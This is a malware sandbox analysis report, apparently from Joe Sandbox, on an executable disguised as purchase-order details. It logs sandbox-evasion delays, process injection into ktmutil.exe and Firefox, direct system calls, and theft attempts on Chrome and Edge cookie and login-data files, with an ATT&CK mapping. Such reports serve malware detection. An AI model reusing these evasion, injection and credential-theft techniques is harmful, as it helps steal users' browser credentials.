Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 12B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 5650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 6650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 6780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: 7780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: BB40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: CB40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: CFD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Memory allocated: DFD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe	Window / User API: threadDelayed 2955			Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Window / User API: threadDelayed 7019			Jump to behavior

Source: C:\Users\user\Desktop\Details Of Our PO..exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\ktmutil.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\Details Of Our PO..exe TID: 2672	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe TID: 4768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7452	Thread sleep count: 2955 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7452	Thread sleep time: -5910000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7452	Thread sleep count: 7019 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7452	Thread sleep time: -14038000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe TID: 7572	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe TID: 7572	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe TID: 7572	Thread sleep time: -64500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe TID: 7572	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe TID: 7572	Thread sleep time: -45000s >= -30000s	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Details Of Our PO..exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Details Of Our PO..exe

Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ktmutil.exe, 00000004.00000002.3636898857.0000000000593000.00000004.00000020.00020000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3638727689.0000000001139000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000C.00000002.1606426818.0000010F3DE0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtCreateFile: Direct from: 0x77752FEC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtOpenFile: Direct from: 0x77752DCC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtSetInformationThread: Direct from: 0x777463F9	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQueryInformationToken: Direct from: 0x77752CAC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtTerminateThread: Direct from: 0x77752FCC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtSetInformationProcess: Direct from: 0x77752C5C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtNotifyChangeKey: Direct from: 0x77753C2C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtOpenKeyEx: Direct from: 0x77752B9C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtOpenSection: Direct from: 0x77752E0C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtProtectVirtualMemory: Direct from: 0x77747B2E	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQuerySystemInformation: Direct from: 0x777548CC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtCreateUserProcess: Direct from: 0x7775371C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtWriteVirtualMemory: Direct from: 0x7775490C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQueryInformationProcess: Direct from: 0x77752C26	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtResumeThread: Direct from: 0x77752FBC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtReadVirtualMemory: Direct from: 0x77752E8C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtCreateKey: Direct from: 0x77752C6C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtSetInformationThread: Direct from: 0x77752B4C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQueryAttributesFile: Direct from: 0x77752E6C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtCreateMutant: Direct from: 0x777535CC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtMapViewOfSection: Direct from: 0x77752D1C	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtResumeThread: Direct from: 0x777536AC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtReadFile: Direct from: 0x77752ADC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtQuerySystemInformation: Direct from: 0x77752DFC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtDelayExecution: Direct from: 0x77752DDC	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC	Jump to behavior

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: NULL target: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3638596905.0000000001001000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000000.1226886547.0000000001000000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3638961154.00000000015A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3638596905.0000000001001000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000000.1226886547.0000000001000000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3638961154.00000000015A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3638596905.0000000001001000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000000.1226886547.0000000001000000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3638961154.00000000015A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3638596905.0000000001001000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000000.1226886547.0000000001000000.00000002.00000001.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3638961154.00000000015A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	32 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement